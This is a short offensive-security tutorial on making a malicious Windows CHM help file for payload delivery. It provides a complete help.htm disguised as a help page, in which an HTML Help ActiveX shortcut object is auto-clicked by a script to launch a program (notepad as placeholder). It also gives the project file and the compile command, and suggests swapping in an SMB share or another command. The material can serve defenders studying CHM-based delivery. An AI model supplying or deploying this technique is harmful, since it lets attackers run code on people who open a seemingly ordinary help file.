Malware Delivery - I (Creating a malicious chm file)

Payload Delivery using CHM file

create the malicious html file help.htm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft HTML Help Workshop 4.0">
<title>Monitoring help messages</title>
</head>

<body>

<h1>Monitoring help messages
</h1>

<p>You can view help messages to troubleshoot context-sensitive help. Help messages contain the text of each HTML Help API call that is made. Each time you activate context sensitive help in your application, a new message appears including parameters such as the topic ID, text file, and compiled help file that were referenced in the call. These messages can be saved as a text file.
</p>

<h4>What do you want to do?</h4>

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',explorer.exe,C:\Windows\System32\notepad.exe'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>

</body>
</html>

Create the help.hhp file

1
2
3
4
5
6
[OPTIONS]
Compiled file=help.chm

[FILES]
help.htm

Download the Microsoft HTML Help Workshop and Documentation

Put both the file in the same folder
alt text

Now run from the directory containing the files "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" hello.hhp

alt text

Warning window is pop
alt text
onclicking yes we will see that our command got executed.
alt text

We can use and smb share in payload with file explorer or we can use command depending on the use cage change the paylod 

1
2
<PARAM name="Item1" value=',explorer.exe,C:\Windows\System32\notepad.exe'>

⬆︎TOP